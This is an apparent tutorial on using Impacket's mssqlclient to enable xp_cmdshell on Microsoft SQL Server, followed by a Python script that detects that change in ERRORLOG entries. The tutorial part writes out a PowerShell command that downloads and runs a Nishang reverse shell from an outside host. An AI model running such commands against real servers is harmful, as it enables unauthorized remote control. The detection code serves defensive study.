Impacket-MSSQLClient Reverse shell

I would like to share how to create a reverse shell with Impacket's mssqlclient, which makes use of the xp_cmdshell functionality.

You can install Impacket from its GitHub repository: https://github.com/SecureAuthCorp/impacket

I have already shared tutorials on activating xp_cmdshell manually at https://rioasmara.com/2020/01/31/mssql-rce-and-reverse-shell-xp_cmdshell/ and https://rioasmara.com/2020/01/31/mssql-rce-and-reverse-shell-xp_cmdshell-with-nishang/

With Impacket's mssqlclient you do not need to do the manual work, such as writing the SQL statements that activate xp_cmdshell. Impacket makes this easier for you.

You can connect to the database using this command:

mssqlclient.py rio_services@192.168.12.1 -windows-auth
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(RIODB): Line 1: Changed database context to 'master'.
[*] INFO(RIODB): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands

If you type help you will get information like the below:

SQL> help

     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd

You need to run enable_xp_cmdshell before you can execute remote commands.

SQL> enable_xp_cmdshell
[*] INFO(RIODB): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(RIODB): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.

You will see output like the above, but you do not actually need to run the RECONFIGURE statement yourself, since Impacket has already done it for you.

Next, if you want to create a reverse shell, you can run the command below to connect back to the netcat listener defined in the Nishang PowerShell script:

SQL> xp_cmdshell powershell IEX(New-Object Net.webclient).downloadString(\"http://10.10.14.3:8000/rv.ps1\")

The above command launches a reverse shell using the Nishang framework. You can find the details of how to prepare the Nishang reverse shell in my previous tutorial.
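From the defender's side, the two "Configuration option ... changed from 0 to 1" messages that mssqlclient prints are the same text SQL Server writes to its ERRORLOG whenever sp_configure is run, so they are a good thing to alert on. The script below is an added example for this post, not part of Impacket or the original tutorial; it parses constructed ERRORLOG lines (assumed standard timestamp / spid / message layout) and flags each session that switched xp_cmdshell on, noting whether 'show advanced options' was flipped first in that same session, which is the sequence an automated enabler produces.

```python
import re
from dataclasses import dataclass

# Matches the sp_configure message SQL Server writes to its ERRORLOG; the
# message text is the one shown in the mssqlclient output above.
ERRORLOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

@dataclass
class ConfigChange:
    ts: str
    spid: str
    option: str
    old: int
    new: int

def parse_config_changes(lines):
    """Extract every sp_configure change record from ERRORLOG lines."""
    changes = []
    for line in lines:
        m = ERRORLOG_RE.match(line.rstrip())
        if m:
            changes.append(ConfigChange(m["ts"], m["spid"], m["option"],
                                        int(m["old"]), int(m["new"])))
    return changes

def find_xp_cmdshell_enablement(lines):
    """One alert per xp_cmdshell 0->1 flip; records whether the same spid
    enabled 'show advanced options' earlier in the log."""
    alerts, advanced_spids = [], set()
    for c in parse_config_changes(lines):
        if c.option == "show advanced options" and c.new == 1:
            advanced_spids.add(c.spid)
        elif c.option == "xp_cmdshell" and c.old == 0 and c.new == 1:
            alerts.append({"ts": c.ts, "spid": c.spid,
                           "advanced_options_first": c.spid in advanced_spids})
    return alerts

# Constructed sample ERRORLOG lines (not captured from a real host).
SAMPLE_LOG = [
    "2020-01-31 10:15:00.00 Server      Microsoft SQL Server 2017 starting",
    "2020-01-31 10:15:20.12 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2020-01-31 10:15:20.13 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2020-01-31 10:40:02.77 spid61      Configuration option 'max server memory (MB)' changed from 2147483647 to 8192. Run the RECONFIGURE statement to install.",
    "2020-01-31 11:02:11.03 spid55      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.",
]

if __name__ == "__main__":
    for alert in find_xp_cmdshell_enablement(SAMPLE_LOG):
        print(alert)
```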
